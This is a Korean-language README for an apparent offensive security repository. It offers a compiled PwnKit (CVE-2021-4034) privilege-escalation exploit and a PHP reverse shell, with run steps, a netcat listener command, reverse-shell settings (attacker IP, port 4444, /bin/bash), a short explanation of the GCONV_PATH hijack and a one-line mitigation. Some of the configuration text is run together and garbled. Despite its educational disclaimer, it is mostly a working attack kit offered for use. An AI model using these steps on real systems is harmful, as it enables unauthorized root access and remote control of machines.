
CVE-2021-4034 (PwnKit) 취약점에 대한 개념 증명(PoC)과 Linux 환경에서의 권한 상승 및 원격 실행 시연을 위한 스크립팅 유틸리티가 포함된 보안 연구 저장소입니다.
⚠️ 면책 조항: 이 저장소는 교육 및 보안 연구 목적으로만 생성되었습니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다. 통제된 환경이나 명시적 허가를 받은 곳에서만 사용하십시오.
이 저장소는 Polkit의 pkexec 구성 요소에 있는 로컬 권한 상승의 심각한 취약점인 PwnKit(CVE-2021-4034)에 대한 컴파일된 개념 증명(PoC)을 포함합니다.
또한 익스플로잇 후 또는 초기 접근 벡터로 배포할 수 있는 PHP 리버스 셸 스크립트가 포함되어 있습니다.
취약한 Linux 시스템에서 root 접근 권한을 획득하고 리버스 셸을 통해 지속성 또는 원격 제어를 설정합니다.
PwnKit (ELF 바이너리)CVE-2021-4034용으로 컴파일된 익스플로잇입니다.
pkexec의 환경 변수를 조작하여 악성 공유 라이브러리를 로드하고 root 권한으로 코드를 실행합니다.pkexec가 설치되어 있어야 합니다.reverseShell.php리버스 연결을 설정하기 위한 경량 페이로드입니다.
192.168.1.84444/bin/bashphp reverseShell.php)를 통해 실행하거나 취약한 웹 서버에 주입할 수 있습니다.PwnKit 바이너리를 대상 시스템에 전송합니다.chmod +x PwnKit
./PwnKit
nc -lvnp 4444
reverseShell.php를 편집합니다.php reverseShell.php
이 취약점은 pkexec가 명령줄 인수를 처리하는 방식에 있습니다. 빈 인수 목록을 전달하면 pkexec가 범위를 벗어난 argv[1]에 접근하려고 시도하며, 공격자가 메모리의 환경 변수를 덮어쓸 수 있게 됩니다. 특히 악성 GCONV_PATH 변수를 주입하여 실행 흐름을 가로챕니다.
이 익스플로잇으로부터 보호하려면:
chmod 0755 /usr/bin/pkexec
Happy Hacking! 🏴☠️